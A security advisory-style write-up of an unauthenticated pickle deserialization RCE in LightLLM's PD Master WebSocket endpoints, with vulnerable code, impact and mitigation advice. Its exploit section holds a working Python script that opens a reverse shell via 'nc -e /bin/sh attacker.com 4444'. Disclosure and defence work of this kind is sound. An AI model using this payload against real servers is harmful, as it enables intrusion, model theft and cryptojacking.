The vulnerability lies in lightllm/server/api_http.py, specifically in how the PD Master node handles incoming connections from workers. The system exposes WebSocket endpoints (/pd_register and /kv_move_status) to coordinate the cluster. Ideally, these internal management ports would be bound to localhost or authenticated via mTLS. LightLLM does neither.

In fact, the code contains an assertion that forces the server to be exposed to the network. Look at this check in the server startup logic:

# explicitly forbidding safety
assert manager.args.host not in ["127.0.0.1", "localhost"]

The application literally refuses to start if you try to bind it to a safe, local loopback address. It demands to listen on a public or otherwise reachable interface. Once that interface is up, it accepts WebSocket connections without any form of authentication: no tokens, no passwords, no cryptographic handshake.

Once a connection is established, the server waits for binary frames. And what does it do with those frames? It passes them directly to pickle.loads(). For the uninitiated: pickle is a stack-based virtual machine. Deserializing a pickle stream isn't just reading data; it's executing a program. If you let an attacker feed you a pickle, you are letting them run their own bytecode on your CPU.
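To see the "virtual machine" part for yourself, here is a minimal, harmless sketch using the standard library's pickletools module. The Demo class and the opcode_names helper are illustrative names, not anything from LightLLM. The point is that the byte stream contains instructions (load a global, build arguments, call it) rather than plain data.

```python
import pickle
import pickletools


class Demo:
    """Hypothetical, harmless class: unpickling it calls int("42")."""

    def __reduce__(self):
        # (callable, args) pair that pickle records in the stream.
        return (int, ("42",))


def opcode_names(blob: bytes) -> list:
    """List the opcodes in a pickle stream without executing any of them."""
    return [op.name for op, _arg, _pos in pickletools.genops(blob)]


# Protocol 2 is an arbitrary choice that keeps the opcode listing short.
blob = pickle.dumps(Demo(), protocol=2)
names = opcode_names(blob)
print(names)

# Loading the stream runs the program: GLOBAL fetches int, REDUCE calls it.
value = pickle.loads(blob)
print(value)
```

The listing includes a GLOBAL opcode (resolve a callable by module and name) and a REDUCE opcode (call it), and the loaded value is the integer 42 rather than a Demo instance. Swap int for something less friendly and you have the whole bug class.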

CVE-2026-26220

9.3

LightLLM RCE: When 'High Performance' Means Faster Shells

Amit Schendel

Senior Security Researcher

Feb 17, 2026 · 7 min read

PoC Available

Executive Summary (TL;DR)

Critical RCE in LightLLM <= 1.1.0 via unsafe Python `pickle` deserialization. The server forces network exposure and lacks authentication on WebSocket endpoints used for worker registration. Attackers can send malicious pickle payloads to achieve full system compromise.

LightLLM, a high-performance LLM inference engine, contains a critical Remote Code Execution (RCE) vulnerability in its Prefill-Decode (PD) disaggregation system. The flaw arises from the unsafe deserialization of untrusted data using Python's `pickle` module on exposed WebSocket endpoints. Compounding the issue, the application explicitly forbids binding to localhost, forcing these vulnerable endpoints to be network-accessible. This allows unauthenticated attackers to execute arbitrary code with the privileges of the inference server, potentially compromising high-value GPU clusters and proprietary models.

Attack Flow Diagram

The Hook: Speed Kills (Security)

Welcome to the bleeding edge of AI, where "move fast and break things" isn't just a motto—it's an architectural standard. LightLLM is a serious piece of kit; it's a Python-based Large Language Model inference engine designed for high throughput and low latency. It supports the heavy hitters like LLaMA and BLOOM, utilizing a clever architecture called PD (Prefill-Decode) Disaggregation. This splits the heavy lifting of processing prompts (prefill) and generating tokens (decode) across different nodes.

But here is the catch: In the race to squeeze every teraflop out of those H100s, the developers committed one of the cardinal sins of Python programming. They built a distributed system that talks to itself using pickle, Python's built-in serialization protocol. If you've been in the security game for more than five minutes, you know exactly where this is going.

To make matters worse—and honestly, somewhat funnier—the developers seemingly went out of their way to ensure this vulnerability was exploitable. This isn't just a case of "oops, I left the door unlocked." This is a case of the architect explicitly designing the house so the front door cannot be closed. Let's dig into the wreckage.

The Flaw: Forced Exposure

In fact, the code contains an assertion that forces the server to be exposed to the network. Look at this check in the server startup logic:

# explicitly forbidding safety
assert manager.args.host not in ["127.0.0.1", "localhost"]

The Code: The Smoking Gun

Let's look at the crime scene in lightllm/server/api_http.py. The code below handles the registration of new PD nodes. It expects a JSON frame first (which it parses safely), but then it switches modes and blindly trusts the next bytes off the wire.

# lightllm/server/api_http.py
 
async def pd_register(request):
    # ... websocket setup ...
    while True:
        try:
            # The attacker sends bytes here
            data = await websocket.receive_bytes()
            
            # AND HERE IS THE RCE
            # No signature check. No allowlist. Just pure, unadulterated execution.
            obj = pickle.loads(data)
            
            # The server assumes 'obj' is a harmless status update.
            # The attacker knows 'obj' is a reverse shell.
            if isinstance(obj, NodeStatus):
                manager.process_node_status(obj)
                
        except Exception as e:
            break

There is no validation of the data before it hits pickle.loads(). The Python documentation has carried a giant red warning box about this for decades: "The pickle module is not secure. Only unpickle data you trust."

In this context, "trust" is non-existent. Any IP address that can reach the PD Master port (which, remember, cannot be localhost) can send a packet that triggers this line. The same pattern repeats in the /kv_move_status endpoint, giving attackers multiple avenues for exploitation.
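For contrast, this is roughly what an allowlist looks like when one exists. The sketch below follows the "restricting globals" pattern from the Python pickle documentation: subclass pickle.Unpickler and override find_class. The ALLOWED_GLOBALS set, the restricted_loads helper, and the Probe class are assumptions made for illustration; none of this is LightLLM code, and it is a damage limiter rather than a cure.

```python
import io
import os
import pickle

# Hypothetical allowlist of (module, name) pairs the receiver agrees to resolve.
# A real deployment would list only its own message classes here.
ALLOWED_GLOBALS = {("builtins", "set"), ("builtins", "frozenset")}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses any global outside ALLOWED_GLOBALS."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def restricted_loads(data: bytes):
    """Analogue of pickle.loads() that enforces the allowlist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Probe:
    """Harmless stand-in for a hostile payload: it asks for os.getcwd()."""

    def __reduce__(self):
        return (os.getcwd, ())


# Plain containers need no globals, so they load normally.
plain = restricted_loads(pickle.dumps({"node_id": 1, "mode": "prefill"}))

# The probe needs a global that is not on the list, so loading is refused
# before the callable is ever invoked.
try:
    restricted_loads(pickle.dumps(Probe()))
    blocked = False
except pickle.UnpicklingError:
    blocked = True

print(plain, blocked)
```

Even with a filter like this in place, every class on the allowlist becomes attack surface, which is why a data-only format is the better destination.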

The Exploit: Weaponizing Protocol 5

Exploiting this is trivial. We don't need to bypass ASLR, we don't need heap grooming, and we don't need to worry about stack canaries. We just need to speak WebSocket and send a serialized Python object whose class defines a __reduce__ method. When the attacker pickles the object, __reduce__ returns a callable plus its arguments, and pickle records both in the byte stream. When the server unpickles those bytes, it calls that callable with those arguments to "reconstruct" the object.
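The timing matters, so here is a harmless sketch of it. The Probe class and the choice of sorted as the callable are purely illustrative. __reduce__ runs once, on the sender, when the object is pickled; the callable it named runs on the receiver when the bytes are loaded, and the receiver never needs the Probe class at all.

```python
import pickle


class Probe:
    """Harmless stand-in for a malicious class; counts calls to __reduce__."""

    reduce_calls = 0

    def __reduce__(self):
        Probe.reduce_calls += 1
        # (callable, args): the unpickler will call sorted([3, 1, 2]).
        return (sorted, ([3, 1, 2],))


blob = pickle.dumps(Probe())      # __reduce__ runs here, on the sender
calls_after_dump = Probe.reduce_calls

result = pickle.loads(blob)       # sorted() runs here, on the receiver
calls_after_load = Probe.reduce_calls

print(calls_after_dump, calls_after_load, result)
```

The counter stays at 1 after loading, and the result is the sorted list rather than a Probe instance. The receiver simply ran whatever function the sender asked for.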

Here is how an attacker creates a "Greeting Card" that installs a backdoor:

1. Handshake: Connect to ws://<TARGET>:8000/pd_register.
2. The Fluff: Send a valid JSON payload to satisfy the initial protocol check, e.g. {"node_id": 1337, "mode": "prefill", ...}.
3. The Hammer: Send the pickled payload.

import pickle
import os
import asyncio
import websockets
import json
 
# The payload class
class MaliciousPickle(object):
    def __reduce__(self):
        # This tuple tells pickle: "Import os, and run os.system(cmd)"
        cmd = "nc -e /bin/sh attacker.com 4444"
        return (os.system, (cmd,))
 
async def pwn(target_url):
    async with websockets.connect(target_url) as ws:
        # Step 1: Satisfy the JSON gatekeeper
        registration = {
            "node_id": 666,
            "client_ip_port": "127.0.0.1:8000",
            "mode": "prefill",
            "start_args": {}
        }
        await ws.send(json.dumps(registration))
        
        # Step 2: Send the spicy binary
        payload = pickle.dumps(MaliciousPickle())
        await ws.send(payload)
        print("Payload sent. Check your listener.")
 
# Run it against the /pd_register endpoint
asyncio.run(pwn("ws://target-ip:8000/pd_register"))

When the server receives that binary blob, it dutifully reconstructs the object. In doing so, it invokes os.system, which spawns a reverse shell back to the attacker. Game over.

The Impact: Your GPU Cluster is Now My Mining Rig

The impact here cannot be overstated. We are talking about unauthenticated Remote Code Execution on infrastructure designed to handle sensitive data and expensive computations.

Confidentiality: Attackers can exfiltrate the proprietary LLM weights (often worth millions in R&D), the prompts being sent by users (PII/Intellectual Property), and the generated output.

Integrity: An attacker can poison the model output, modify the inference logic, or inject subtle biases into the results.

Availability: This is the most likely outcome. Attackers will use your H100 cluster to mine crypto or crack hashes. Given the compute power of a standard LightLLM node, this is a goldmine for cryptojackers.

Furthermore, because these nodes are often part of a larger Kubernetes cluster or VPC, this RCE serves as an ideal pivot point to attack the rest of the internal network. The "PD Master" is effectively a master key to the kingdom.

Mitigation: Just Use JSON

The fix is simple, yet it requires a fundamental change in how the application thinks about data serialization.

1. Stop Using Pickle: Replace pickle with a safe serialization format like JSON or MessagePack. These formats are data-only and do not support arbitrary code execution during deserialization. If you absolutely must send complex objects, authenticate each message with an HMAC and verify the tag before unpickling. This is still risky, because anyone who obtains the key can execute code on the receiver.

2. Authenticate Everything: Implement an internal API token mechanism or use Mutual TLS (mTLS). No service should accept connections from the open internet—or even the internal network—without verifying identity.

3. Network Segmentation: Since the application forces you to bind to non-localhost interfaces, you must use firewalls (iptables, AWS Security Groups) to strictly limit access to the PD Master port (usually 8000). Only the IPs of known worker nodes should be allowed to connect.
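Points 2 and 3 can also be enforced inside the application, as a complement to the firewall rather than a replacement for it. The sketch below is a minimal gate that a WebSocket handler could call before accepting a peer. The network range, the "authorization" header name, the bearer scheme, and all function names are assumptions for illustration; LightLLM has no such hook today.

```python
import hmac
import ipaddress

# Hypothetical subnet that holds the known worker nodes.
WORKER_NETWORKS = [ipaddress.ip_network("10.0.5.0/24")]


def peer_allowed(peer_ip: str, networks=WORKER_NETWORKS) -> bool:
    """Return True only if peer_ip parses and falls inside an allowed network."""
    try:
        addr = ipaddress.ip_address(peer_ip)
    except ValueError:
        return False
    return any(addr in net for net in networks)


def token_valid(headers: dict, expected_token: str) -> bool:
    """Check an 'authorization: Bearer <token>' header in constant time."""
    scheme, _, presented = headers.get("authorization", "").partition(" ")
    if scheme.lower() != "bearer" or not presented:
        return False
    return hmac.compare_digest(presented.encode("utf-8"),
                               expected_token.encode("utf-8"))


def accept_connection(peer_ip: str, headers: dict, expected_token: str) -> bool:
    """Both checks must pass before any frame from the peer is read."""
    return peer_allowed(peer_ip) and token_valid(headers, expected_token)


ok = accept_connection("10.0.5.17", {"authorization": "Bearer s3cret"}, "s3cret")
wrong_net = accept_connection("203.0.113.9", {"authorization": "Bearer s3cret"}, "s3cret")
no_token = accept_connection("10.0.5.17", {}, "s3cret")
print(ok, wrong_net, no_token)
```

hmac.compare_digest is used instead of == so that the comparison time does not leak how much of the token was correct. A shared token is the cheap option; mTLS gives each worker its own identity.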

Vendor Fix: The maintainers need to remove the assert manager.args.host not in ["127.0.0.1", "localhost"] check and refactor api_http.py to use json.loads() instead of pickle.loads(). Until then, treat every LightLLM instance as a ticking time bomb.
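A minimal sketch of what a JSON-based status message could look like, assuming a message with three fields. The NodeStatusMessage class, its field names, and the encode/decode helpers are hypothetical; the real NodeStatus object in LightLLM may carry different data. The "prefill" and "decode" modes come from the PD design described above.

```python
import json
from dataclasses import asdict, dataclass

ALLOWED_MODES = {"prefill", "decode"}
EXPECTED_KEYS = {"node_id", "mode", "healthy"}


@dataclass(frozen=True)
class NodeStatusMessage:
    """Hypothetical status update; the field names are assumptions."""

    node_id: int
    mode: str
    healthy: bool


def encode_status(msg: NodeStatusMessage) -> bytes:
    """Serialize to UTF-8 JSON: data only, nothing callable."""
    return json.dumps(asdict(msg)).encode("utf-8")


def decode_status(raw: bytes) -> NodeStatusMessage:
    """Parse and validate a frame; raise ValueError on anything unexpected."""
    data = json.loads(raw)  # malformed input raises a ValueError subclass
    if not isinstance(data, dict) or set(data) != EXPECTED_KEYS:
        raise ValueError("unexpected message shape")
    if type(data["node_id"]) is not int:
        raise ValueError("node_id must be an integer")
    if not isinstance(data["mode"], str) or data["mode"] not in ALLOWED_MODES:
        raise ValueError("mode must be 'prefill' or 'decode'")
    if type(data["healthy"]) is not bool:
        raise ValueError("healthy must be a boolean")
    return NodeStatusMessage(**data)


original = NodeStatusMessage(node_id=7, mode="decode", healthy=True)
round_tripped = decode_status(encode_status(original))
print(round_tripped)
```

The worst a hostile frame can do here is raise ValueError. Parsing produces dictionaries, strings, and numbers, and the explicit checks decide which of those become a message.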

Technical Appendix

CVSS Score

9.3 / 10

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
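If the vector string reads like line noise, a few lines of Python will split it into its metrics. The parse_cvss_vector helper is an illustrative name, and it only splits the string; it does not compute the score.

```python
def parse_cvss_vector(vector: str) -> dict:
    """Split a CVSS vector string into a {metric: value} mapping."""
    prefix, *metrics = vector.split("/")
    label, _, version = prefix.partition(":")
    if label != "CVSS" or not version:
        raise ValueError("not a CVSS vector string")
    parsed = {"version": version}
    for metric in metrics:
        name, _, value = metric.partition(":")
        parsed[name] = value
    return parsed


vector = parse_cvss_vector(
    "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
)
print(vector["AV"], vector["PR"], vector["UI"])
```

Read against the CVSS v4.0 metric definitions, AV:N means the attack vector is the network, PR:N means no privileges are required, UI:N means no user interaction is needed, and VC/VI/VA:H mean high impact on the confidentiality, integrity, and availability of the vulnerable system.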

Affected Systems

LightLLM Inference Engine <= 1.1.0
LightLLM PD Master Node

Affected Versions Detail

Product	Affected Versions	Fixed Version
LightLLM (ModelTC)	<= 1.1.0	N/A

Attribute	Detail
CWE ID	CWE-502 (Deserialization of Untrusted Data)
CVSS v4.0	9.3 (Critical)
Attack Vector	Network (WebSocket)
Authentication	None Required
Privileges	User (Process Owner)
Exploit Status	PoC Available